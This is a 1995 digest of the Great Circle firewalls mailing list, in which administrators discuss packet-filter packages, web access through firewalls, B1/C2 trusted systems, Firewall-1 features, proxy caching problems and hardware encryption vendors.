Date: Tue, 8 Aug 1995 13:51:49 -0700 (MST) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1246 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. I'm just wondering if there are any shareware/public domain IP filtering package available for Solaris 2.4 systems. I've already looked at the Firewall-1 package and while it looks really impressive, I just thought I'll look around for a public domain one before (making my boss) spending $4G to get the full-version. I've also looked at ip_fil2.7.3 and screend, but unless I'm missing something they both only run on BSD style kernel and you need the source code at that. Thank you and have a whatever kind of day you prefer. (c: -- +----------------------------------+---------------------------------------+ | Francis Hartojo | Internet: Francis.Hartojo@asu.edu | | Engineering Computer Services | Phone: (602) 965-8248 (work) | | Arizona State University | (602) 820-6029 (home) | | _______ | _______ | | \ .'--------------------------+------------------------------`. / | +--> | A lot of time has been wasted arguing on what came first: | <---+ /____| the egg or the chicken. It's obviously the rooster. |____\ `-----------------------------------------------------------' From firewalls-owner Tue Aug 8 15:08:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26260 for firewalls-outgoing; Tue, 8 Aug 1995 14:48:43 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA26217 for ; Tue, 8 Aug 1995 14:48:36 -0700 Received: from firewall.statoil.no(193.212.68.177) by miles via smap (V1.3) id sma026204; Tue Aug 8 14:47:50 1995 Received: (from mailrelay@localhost) by firewall.statoil.no (8.6.12/8.6.12) id XAA21941 for ; Tue, 8 Aug 1995 23:52:58 +0200 Received: (from internal network) by firewall.statoil.no with SMTP id AA021937; Tue Aug 8 23:52:33 1995 Received: from safir.und.st.statoil.no by swing.data.st.statoil.no with SMTP (5.61++/IDA-1.2.8) id AA17359; Tue, 20 Jun 95 07:08:22 +0200 Received: from kvarts.st.statoil.no by safir.und.st.statoil.no (4.1/SMI-4.1) id AA16302; Tue, 20 Jun 95 06:43:01 +0200 Received: by kvarts.st.statoil.no (4.1/SMI-4.1) id AA13078; Tue, 20 Jun 95 07:05:41 +0200 Date: Tue, 20 Jun 95 07:05:41 +0200 From: seen@statoil.no (S-E Engbraaten) Message-Id: <9506200505.AA13078@kvarts.st.statoil.no> To: Firewalls@GreatCircle.COM Subject: WWW through firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello! My company at the moment provides 4 Internet services through our firewall: ftp, telnet, email and nntp (news). We believe we have a sensible and protected setup. At the same time users are screaming for WWW access. They have seen the friendly interface, and have seen useful information. And other companies are making information that my company uses available through WWW. The company basically puts up these requirements on the Internet access: - Nobody from the Internet - ie outside the firewall - should be able to initiate any kind of action on the inside machines. - When people from the company initiates actions through the firewall, there should be no chance of unwanted actions hap- pening on the inside machines. Ie if the user clicks to se a pretty picture, nothing but the generation of that picture should happen. No unwanted side effects, basically. So - the bottom line is: If it isn't secure, it isn't worth it. My fundamental question is how to implement WWW access to the users and still maintain these requirements. I can see several solutions, but I'm not sure yet how all of them match the basic requirements: - Don't give users access to WWW. - Put up standalone machines at strategic places. - Put up some sort of secured WWW access through specific software on the users machines. - Put up some sort of secured WWW access on the firewall only. - Put up a standard WWW access mechanism altoghether. We are not planning on setting up WWW pages, we just want our users - potentially well over 5000 - to look at whats out there. Regards, Stein-Erik --------------------------------------------- Stein-Erik Engbr}ten, Statoil, Norway mail: Statoil SDATA BAS, Box 300, N-4001 Stavanger, NORWAY email: seen@statoil.no --------------------------------------------- From firewalls-owner Tue Aug 8 15:31:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27107 for firewalls-outgoing; Tue, 8 Aug 1995 15:04:52 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA27099 for ; Tue, 8 Aug 1995 15:04:50 -0700 Received: from utrecht.knoware.nl(193.78.120.3) by miles via smap (V1.3) id sma027088; Tue Aug 8 15:04:06 1995 Received: from csehost.idiscover.co.uk (csehost.idiscover.co.uk [194.128.134.177]) by utrecht.knoware.nl (8.6.12/8.6.12) with SMTP id AAA17048; Wed, 9 Aug 1995 00:02:39 +0200 Date: Wed, 9 Aug 1995 00:02:39 +0200 Message-Id: <199508082202.AAA17048@utrecht.knoware.nl> X-Sender: njb@pop.knoware.nl Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Morgan Stair From: njb@knoware.nl (Niels Bjergstrom) Subject: Re: Phone numbers Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Does anyone know the phone numbers for these router companies. Try to look at Brent's lists of references at URL: http://www.greatcircle.com He has a very good reference list containing all kinds of info about commercial fw products. Rgds, Niels ------------------------------------------------------------------------ -- Niels J Bjergstrom, Ph.D., m/ISACA Tel. +31 70 362 2269 -- -- Computer Security Engineers, Ltd. Fax. +31 70 365 2286 -- -- Postbus 85 502, NL-2508 CE Den Haag London: +44 181 519 8011 -- -- Netherlands Email: njb@csehost.knoware.nl -- -- PGP Public key available on request - please use when mailing vira -- ------------------------------------------------------------------------ From firewalls-owner Tue Aug 8 16:34:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01164 for firewalls-outgoing; Tue, 8 Aug 1995 16:27:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01130 for ; Tue, 8 Aug 1995 16:27:30 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma000931; Tue Aug 8 16:26:20 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA10124; Tue, 8 Aug 95 18:41:22 EDT Message-Id: <9508082241.AA10124@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Multilevel Security is good for firewalls To: kaplan@bpa.arizona.edu (Ray Kaplan) Date: Tue, 8 Aug 1995 18:43:03 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Ray Kaplan" at Aug 3, 95 08:25:54 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ray and others, C2 is great for firewalls and B1 is better (see below) I'm enjoying this discussion a lot. I hear a lot of frustrations out there about Orange Book style security. Guess I'm naturally biased here because I work for an organization that provided the first B1 evalutated version of UNIX. I've been involved in three major fieldings of our product now, and have spent months at customer sites as the technical point of contact for our software. I have found that most of the "incompatiabilities" with security software were really systems integration issues masquarading under the title of security issues. B1 doesn't have to hurt. We run commercial-off-the-shelf (COTS) software on our B1 systems with only minor configuration changes, unless that software's function is to do something that is inherently non secure. The security software often gets blamed because we're an easy target. If something works on some other system without security, and doesn't work here, it must be the security that is getting in the way, right? WRONG!! This argument usually breaks down because the assumption that the systems are otherwise identical is false. But even when that assumption holds, the conclusion doesn't always follow. Sometimes a secure operating system will excercize portions of the application that aren't otherwise traversed. In other words, sometimes a secure OS will expose underlying flaws in applications software. Some of these are security related flaws, others are just flaws that we were (un)lucky enough to have found first. This happens all the time in systems integration. I wrote earlier that C2 is great for firewalls. Well B1 is better. It allows you to compartmentalize the services provided by the firewall and to protect the underlying operating system from attack. Also, by appropriately labeling data and binaries; the operating system can prevent itself from executing untrusted binaries or relying upon untrusted configuration data. So B1 is a great addition for protecting the firewall itself from attack. How does that help you build a better firewall? It gives you a trusted host on which to build your firewall application/relay/circuit. A broken firewall is a terrible liability, there goes all of that virtual private network encryption! .. there goes all of your companies data! ..what a nice place to sit and watch whatever your company accesses over the net! I've read a lot complaints about how the evaluation process takes too long to be useful when product cycles are so short. I've been too busy to post to every reply that slams the orange book criteria. But remember, I'm not saying that C2 or B1 is the right thing for every computer in the corporation; however, firewalls are by definition choke points where security policies are enforced. We should use every means available to ensure that our firewall implementations are correct. We're talking about relatively few systems that provide the locks and bars protecting our enterprize data. Use a B1 system to encapsulate OS from the firewall, use the C2 auditing to detect intrusion. All of that builds on existing mature technology. Test the Firewall with the latest from the field of Software Test and Reliability, use an evaluation type process to assure that it works securely. Software Testing can answer the question, "How reliably does my firewall perform?" But it cannot answer the question "How secure is my firewall?" The first question can be answered by comparing the behaviour of the firewall to a specification, and then plotting failures vs execution hours. There are models for predicting the likelyhood of additional failures (Musa "Software Reliability" is a good one). But the second question is more difficult. If I had an implementation of every known security flaw/attack with which to bombard the firewall, I could determine that it covers every known attack, but without a formal model, I have no proof that no other attacks exist, and no idea about how many such attacks exist or how soon they will be uncovered. And while I can easily generate test cases for the first question, how do I generate test cases for unknown attack methods? What I'm driving at here is that a security model can prevent attacks without understanding their underlying mechanizm. Pagett writes about a virus protection scheme that he invented that knows nothing in particular about a given virus. That's possible because the virus has to do something dirty to your system, and he's looking for dirt. [Hope that's an ok description--haven't looked at your code] What we really need are secure protocols and services with which to communicate. Firewalls can implement a policy on top of that to determine which entities can communicate with which other entities and in what ways. Even if the firewall functions perfectly, you may have security problems because you perfectly pass some insecure protocol thru the firewall. ------------------------------------------------------------------- Mark Riggins I've seen the light at the Secure Systems Engineering end of the tunnel--its a train. AT&T Bell Labs From firewalls-owner Tue Aug 8 17:04:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02417 for firewalls-outgoing; Tue, 8 Aug 1995 16:40:54 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA02124 for ; Tue, 8 Aug 1995 16:40:12 -0700 Received: from explorer.csc.com(20.1.10.27) by miles via smap (V1.3) id sma001900; Tue Aug 8 16:38:57 1995 Received: by csc.com (Smail3.1.29.1 #1) id m0sfyDR-000iDLC; Tue, 8 Aug 95 19:37 EDT Message-Id: Date: Tue, 8 Aug 95 19:37 EDT From: hdunn1@csc.com (Patrick Dunn) To: Firewalls@GreatCircle.COM Subject: re: WWW through firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [ Disengage Cloaking ] You write: > The company basically puts up these requirements on the Internet > access: > > - Nobody from the Internet - ie outside the firewall - should > be able to initiate any kind of action on the inside machines. > > - When people from the company initiates actions through the > firewall, there should be no chance of unwanted actions hap- > pening on the inside machines. Ie if the user clicks to se > a pretty picture, nothing but the generation of that picture > So - the bottom line is: If it isn't secure, it isn't worth it. > > My fundamental question is how to implement WWW access to the > users and still maintain these requirements. > ---------------------------------------------------------------------> I have a customer presented with the same problem. First, accept the fact that, regardless of their intentions (or your desire that it be otherwise), your users will be downloading data via their browsers. Whether it be HTML text, Postscript, PDF, GIF or other forms of data, it gets loaded onto the client machine. Can you say "Danger, Will Robinson!!!" Next, resigning yourself to that fact, figure out how to "contain" the (potentially malicious) data/programs. I cannot speak (write) to other architectures, but, on UNIX-flavored machines you can "encapsulate" your application by using the chroot(1) program (or chdir[2]/fchdir[2] system call followed by a chroot[2]/fchroot[2] system a directory subtree dedicated to that purpose. By doing this, you ensure that data (including binaries) downloaded from the net will not have access to anything on your file system "above" the specified "root" directory. The downside to this is that you will have to place your "viewer" applications and other useful programs in the same quarantine area such that it "looks" to them like the actual root file system. It may take a few iterations to identify all of the programs/data that need to be MOVED (we don't want any accidents) to the encapsulated subtree used for the web-related applications. This topic has been covered enough that I won't waste any more (precious;-) bandwidth going into detail. ----------------------------------------- Pat Dunn, Sr. Computer Scientist Computer Sciences Corp. Invoke standard disclaimer cr.. ----------------------------------------- [ Engage Cloaking ] From firewalls-owner Tue Aug 8 17:35:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA04026 for firewalls-outgoing; Tue, 8 Aug 1995 17:17:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA04002 for ; Tue, 8 Aug 1995 17:17:06 -0700 Message-Id: <199508090017.RAA04002@miles.greatcircle.com> Received: from ibmmail.com(199.171.26.3) by miles via smap (V1.3) id sma003996; Tue Aug 8 17:16:27 1995 Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 1122; Tue, 08 Aug 95 20:14:51 EDT Date: Tue, 08 Aug 1995 20:18:14 EDT From: "George Janczuk JZKGEQ - AMPLN1" To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Security Sender: firewalls-owner@GreatCircle.COM Precedence: bulk =========================================================================== Our audit division is interested in gaining access to security based resources (ie: mailing lists). I will be recommending this list (firewalls), best-of-security and risks. I also seem to remember that another SECURITY based list does exist and has been mentioned here before - but I have not been able to find it. Does anyone know of this list? (it may possibly have been a newsgroup). What would other people recommend as an "online" reading list for audit personel? Regards, George Janczuk (auampdrv@ibmmail.com) AMP Society. From firewalls-owner Tue Aug 8 18:00:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA05118 for firewalls-outgoing; Tue, 8 Aug 1995 17:32:41 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA05070 for ; Tue, 8 Aug 1995 17:32:34 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma005058; Tue Aug 8 17:32:16 1995 Received: from Corp.Sun.COM by mercury.Sun.COM (Sun.COM) id RAA26473; Tue, 8 Aug 1995 17:31:05 -0700 Received: from rainbow.Corp.Sun.COM (rainbow-bb.Corp.Sun.COM) by Corp.Sun.COM (5.x/SMI-5.3) id AA10252; Tue, 8 Aug 1995 17:29:13 -0700 Received: from althea.Corp.Sun.COM by rainbow.Corp.Sun.COM (5.x/SMI-SVR4) id AA14418; Tue, 8 Aug 1995 17:29:11 -0700 Received: by althea.Corp.Sun.COM (5.x/SMI-SVR4) id AA00786; Tue, 8 Aug 1995 17:29:35 -0700 Date: Tue, 8 Aug 1995 17:29:35 -0700 From: Jerald.Josephs@Corp.Sun.COM (Jerald Josephs) Message-Id: <9508090029.AA00786@althea.Corp.Sun.COM> To: firewalls@greatcircle.com Subject: Re: Firewall-1 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Version 1.2.1 of Firewall-1 will be officially released from SunSoft (cross my fingers) on Aug 23rd. It is my understanding that Checkpoint has not release a 1.2.1, but a 1.2. They are very simular with the exception of some extra bug fixes in 1.2.1. I would be cautious to bite the vendor for providing 1.0.7c 60 days ago, when, in fact, that was where it was at. /\ Jerald E. Josephs \\ \ Technical Support Engineer - Networks \ \\ / SunService - North American Solution Center / \/ / / / / \//\ Phone/VM: 415-336-9558 \//\ / / FAX: 415-960-0572 / / /\ / E-mail: jerald.josephs@Corp.Sun.COM / \\ \ \ \\ \/ You'll never be without if you look within - unknown (possibly me, but I can't believe I'm the first to say it) >From firewalls-owner@GreatCircle.COM Mon Aug 7 12:47 PDT 1995 >From: strata@virtual.net >Date: Mon, 7 Aug 95 11:25:19 PDT >To: firewalls@greatcircle.com, support@checkpoint.com >Subject: Firewall-1 > > >I would like to thank the folks who pointed out that Firewall-1 is currently >at 1.2.1, I will be looking at a current copy soon. I am investigating why a >certain SF Bay reseller handed me 1.0.7c as "the latest copy" less than 60 >days ago, and will put them in touch with support@checkpoint.com. > >I apologize to the folks at Checkpoint for not talking to them first, >generally I trust my resellers to have economic incentive to give me >current products. > >Cheers, >_Strata > >PS- and yes, I know that the situation I was trying to set up can be >IP spoofed, I was trying to test a subset of what I wanted to do >rather than a sole component of a production firewall handling of FTP. >But thanks also to the folks who pointed that out. > > >************************************************************************* >PGP-- Phil Gets Prosecuted (Persecuted?) Support the Zimmerman Legal >Legal Defense Fund ==> Email: zldf@clark.net http://www.netresponse.com/zldf >************************************************************************* > INTERNET > Installations, Training, Publishing, Security >M. Strata Rose 408-733-UNIX (8649) strata@virtual.net >************************************************************************* > From firewalls-owner Tue Aug 8 21:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12806 for firewalls-outgoing; Tue, 8 Aug 1995 21:17:34 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12798 for ; Tue, 8 Aug 1995 21:17:32 -0700 Received: from ccvcom.auckland.ac.nz(130.216.1.2) by miles via smap (V1.3) id sma012792; Tue Aug 8 21:16:54 1995 Received: from ccu1.auckland.ac.nz by ccvcom.auckland.ac.nz (PMDF V4.3-7 #2864) id <01HTVIV82XXS8XE4OY@ccvcom.auckland.ac.nz>; Wed, 9 Aug 1995 16:13:25 GMT+1300 Received: (from russell@localhost) by ccu1.auckland.ac.nz (8.6.12/8.6.12) id QAA10587 for Firewalls@GreatCircle.COM; Wed, 9 Aug 1995 16:13:16 +1200 Date: Wed, 09 Aug 1995 16:13:15 +1200 (NZT) From: Russell Fulton Subject: push animations and the Cern proxy server. To: Firewalls@GreatCircle.COM (firewalls list) Message-id: <199508090413.QAA10587@ccu1.auckland.ac.nz> MIME-version: 1.0 X-Mailer: ELM [version 2.4 PL23] Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7bit Content-length: 1523 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have recently become aware of a problem with the Cern proxy server with caching enabled when accessing so called push animations. Push animations are multipart documents of essentially infinite length which do animation by repeatedly downloading an inline gif. Currently only netscape understands these. When a user accesses a url for one of these through a caching proxy the proxy keeps the connection open sucking the animation after the client has moved on or pushed stop. If the server has no timeout built into the animation script then the proxy will continue to download data until the process is killed. We have seen several cases where transfers from these urls have exeeded 1GB, a real disaster for us in NZ where we are paying well over $US 1 per MB for traffic on our international link! We aer looking at several different options for modifying the behaviour of the Cern proxy to cope with this problem. At the very least you need to keep an eye out for 'old' proxy processes and kill them off. Cheers, Russell. +-------------------------------------------------------------------+ | Russell Fulton 'phone +64 9 373-7599 x 8955 | | Computer Centre fax +64 9 373-7425 | | University of Auckland email r.fulton@auckland.ac.nz | | Private Bag 92019 time gmt -12 (-13 oct - mar) | | Auckland, New Zealand. psi psi%5301970000073::r.fulton | +-------------------------------------------------------------------+ From firewalls-owner Tue Aug 8 21:47:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12181 for firewalls-outgoing; Tue, 8 Aug 1995 21:04:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA12150 for ; Tue, 8 Aug 1995 21:04:20 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma012141; Tue Aug 8 21:03:29 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA05164; Tue, 8 Aug 95 23:50:55 -0400 Date: Tue, 8 Aug 95 23:50:54 -0400 Message-Id: <9508090350.AA05164@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: Encryption solutions Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Lundon rites: >Due to the nature of the data the data must be encripted as it passes >over the Internet and stong authentication must be used when they connect. >This is a commercial project and the data will cross >International bounderies, for this reason I do not want >to use encription technology such as pgp as some of the >countries will have problems with this. So you want to encrypt but not offend. Sorry to say this cannot be done. >Does anyone know of a hardware solution that can operate >between one local machine and 5 or 6 remote machines? In order of price: 1) Parallon Pathkey (206.641.8338) 2) IRE Encrypting modems (410.931.7500) 3) AT&T 3600 4) STU III (goes up fast from here) Lockheed-Martin also has some products which modesty forbids my mentioning 8*). Apologies if I left someone out. However any good encryption is going to offend those who wish to know what you are transmitting so would like to know why you feel that hardware would be less offensive that software/pgp ? Warmly, Padgett From firewalls-owner Tue Aug 8 22:00:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA13648 for firewalls-outgoing; Tue, 8 Aug 1995 21:31:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA13640 for ; Tue, 8 Aug 1995 21:31:02 -0700 Received: from uni.ins.com(199.0.193.10) by miles via smap (V1.3) id sma013634; Tue Aug 8 21:30:38 1995 Received: from markpc.ins.com (markpc.ins.com [199.0.193.183]) by uni.ins.com (8.6.12/8.6.12) with SMTP id VAA06746; Tue, 8 Aug 1995 21:28:09 -0700 Date: Tue, 8 Aug 1995 21:28:09 -0700 Message-Id: <199508090428.VAA06746@uni.ins.com> X-Sender: kadrich@uni.ins.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Patrick Yeung From: (Mark S. Kadrich) Subject: Re: IP translation in Firewall-1 Cc: firewalls@greatcircle.com X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk NTMK. I have the manual and if it's possible it's an undocumented 'feature'. msk >Is there anybody know if the Firewall-1 (release 1.2.1) can do >IP-translation. That means it can remap the internal networks' IPs to >the Firewall's IP. > >Regards, >Patrick Yeung > > > > ****************************************************************** Mark S. Kadrich, Systems Engineer, International Network Services "The Power of Operable Networks" Voice @ 415-254-4225, Page @ 1-800-514-0355 /\ e-mail @ kadrich@uni.ins.com ( ) Information security is a process, not a solution. ****************************************************************** From firewalls-owner Tue Aug 8 23:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA17179 for firewalls-outgoing; Tue, 8 Aug 1995 23:28:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA17171 for ; Tue, 8 Aug 1995 23:28:03 -0700 Received: from wet-string.avian.org(199.103.168.126) by miles via smap (V1.3) id sma017169; Tue Aug 8 23:28:02 1995 Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id AAA07814; Wed, 9 Aug 1995 00:14:31 -0400 Date: Wed, 9 Aug 1995 00:14:31 -0400 From: *Hobbit* Message-Id: <199508090414.AAA07814@narq.avian.org> To: firewalls@greatcircle.com Subject: sleazewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [Referencing dan thomsen's msg from about a week ago, wherein he says...] As a result we get to learn what kind of attacks people are using against Unix systems. More importantly this shows that type enforcement is a useful tool in preventing system compromises. Yes, and if I remember right, back when the challenge was issued and people finally figured out what was going on, it was pointed out that if SCTC was going to let the net test their product for them, they owed the results of said testing back to the net. I believe someone else from SCTC agreed with this, claiming that the megabytes of raw log would soon be boiled down into some sort of useful report. CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic? The answer is both. The answer so far is "marketing tactic" from the standpoint of "out here on the net", unless you intend to do something about it. Where are your RESULTS?? Where is OUR benefit from all the free work that the community at large has given you? _H* From firewalls-owner Wed Aug 9 01:41:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19188 for firewalls-outgoing; Wed, 9 Aug 1995 01:15:16 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19118 for ; Wed, 9 Aug 1995 01:15:10 -0700 Message-Id: <199508090815.BAA19118@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma018971; Wed Aug 9 01:14:31 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA021435559; Wed, 9 Aug 1995 18:06:00 +1000 From: Darren Reed Subject: Re: Sparc2 as a 3-way packet filter? To: detzel@medoc.medoc-ias.u-psud.fr (Vincent DETZEL) Date: Wed, 9 Aug 1995 18:05:59 +1000 (EST) Cc: dmurphy@cwa.com, firewalls@GreatCircle.COM In-Reply-To: <199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> from "Vincent DETZEL" at Aug 8, 95 09:16:46 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1454 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Vincent DETZEL, sie said: > > dmurphy wrote: > >I've picked up the ipfilter package from Darren Reed, which looks to be > >pretty much what I think I need, and the newest version of screend I was > >able to find (dated April 1990). Any experiences with either of these two > >packages, or pointers to other SW solutions, would be appreciated. > > Hi ! > > I'm in the same situation and It's pretty difficult to make up my mind whether > using screend or ip-fil : > > - screend > seems to be well-suited (fonctionnality, documentation, portability, etc, ...) > despite the fact it's quite old. > > - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz) > it appears to me that it begins to be widely choosed and as a matter of fact, > many changes applied on this package every week (last release dated : Aug 1). > > Does it mean that ip-fil is going to become much more efficient and fonctionnal than screend ? Quite possibly :-) as for changes, I try to do them as rarely as possible, but bugs are bugs and need to be addressed sooner rather than later. I've now got a mailling list for it and will announce it with the next update - I don't think firewalls is the right place for minor updates. I should begin work on an Ultrix port soon (I don't expect to have to do much work) but Solaris2 as not been forgotten - I just need something with Solaris2 on it to work on it. cheers, darren From firewalls-owner Wed Aug 9 02:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19517 for firewalls-outgoing; Wed, 9 Aug 1995 01:22:12 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA19509 for ; Wed, 9 Aug 1995 01:22:10 -0700 From: F.Wetzels@amc.uva.nl Received: from amccca.amc.uva.nl(145.18.202.35) by miles via smap (V1.3) id sma019502; Wed Aug 9 01:21:08 1995 Received: from amcnol.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01HTV6I918C0000402@amc.uva.nl>; Wed, 9 Aug 1995 10:19:21 MET Received: from amchelix.amc.uva.nl by amcnol.amc.uva.nl (5.0/SMI-5.0) id AA14291; Wed, 9 Aug 1995 10:19:17 +0200 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA03426; Wed, 9 Aug 1995 10:18:07 +0200 Date: Wed, 09 Aug 1995 10:18:07 +0200 Subject: Re: IP translation in Firewall-1 To: firewalls@greatcircle.com Message-id: <9508090818.AA03426@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com Content-transfer-encoding: 7BIT Content-length: 726 X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> NTMK. I have the manual and if it's possible it's an undocumented 'feature'. fpmw> msk fpmw> >Is there anybody know if the Firewall-1 (release 1.2.1) can do fpmw> >IP-translation. That means it can remap the internal networks' IPs to fpmw> >the Firewall's IP. Or can it translate certain IP-addresses into IP-addresses from a pre-defined list? So, logical links are maintained between two `virtual' hosts? frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-319.1 wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Wed Aug 9 04:30:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA23683 for firewalls-outgoing; Wed, 9 Aug 1995 04:26:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA23675 for ; Wed, 9 Aug 1995 04:26:22 -0700 Received: from aegis.ptech.com(165.166.50.2) by miles via smap (V1.3) id sma023673; Wed Aug 9 04:26:16 1995 Received: from felix by nexus.ptech.com (5.x/Piedmont Technology Group) id AA06599; Wed, 9 Aug 1995 07:23:43 -0400 Date: Wed, 9 Aug 1995 07:23:43 -0400 Message-Id: <9508091123.AA06599@nexus.ptech.com> X-Sender: jnb@ptech.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: (Mark S. Kadrich), Patrick Yeung From: jim.brown@ptech.com (Jim Brown) Subject: Re: IP translation in Firewall-1 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In the back of the FireWall-1 1.2 manual, it makes reference to IP address translation as future feature on page 14-5. jim At 09:28 PM 8/8/95 -0700, Mark S. Kadrich wrote: >NTMK. I have the manual and if it's possible it's an undocumented 'feature'. >msk >>Is there anybody know if the Firewall-1 (release 1.2.1) can do >>IP-translation. That means it can remap the internal networks' IPs to >>the Firewall's IP. >> >>Regards, >>Patrick Yeung >> >> >> >> >****************************************************************** >Mark S. Kadrich, Systems Engineer, International Network Services >"The Power of Operable Networks" >Voice @ 415-254-4225, Page @ 1-800-514-0355 /\ >e-mail @ kadrich@uni.ins.com ( ) >Information security is a process, not a solution. >****************************************************************** > > > > _________ ___jnb___ From firewalls-owner Wed Aug 9 05:01:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA24048 for firewalls-outgoing; Wed, 9 Aug 1995 04:48:27 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA24017 for ; Wed, 9 Aug 1995 04:48:22 -0700 Received: from leon.cti.gr(150.140.2.3) by miles via smap (V1.3) id sma024010; Wed Aug 9 04:48:18 1995 Received: from hpcl.cti.gr by LEON.CTI.GR (PMDF V4.2-14 #4336) id <01HTVEQ3RGZK90T2Q0@LEON.CTI.GR>; Wed, 9 Aug 1995 14:14:45 EET Received: by hpcl.cti.gr (4.1/SMI-4.1) id AA19819; Wed, 9 Aug 95 14:21:13 +0300 Date: Wed, 09 Aug 1995 14:21:13 +0300 (EET DST) From: adamo@hpcl.cti.gr (Giorgos Adamopoulos) Subject: Re: klaxon To: firewalls@GreatCircle.Com Reply-to: adamo@hpcl.cti.gr Message-id: <9508091121.AA19819@hpcl.cti.gr> MIME-version: 1.0 X-Mailer: ELM [version 2.4 PL21] Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7bit X-Home-Address: 7 Elvetias St., Agia Paraskevi GR15342, Athens, GREECE X-Home-Phone: +30-1-639-4-638 Content-Length: 158 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone earlier mentioned that he downloaded `klaxon'. Where from? Is its source code free? thanks in advance -- Giorgos Adamopoulos 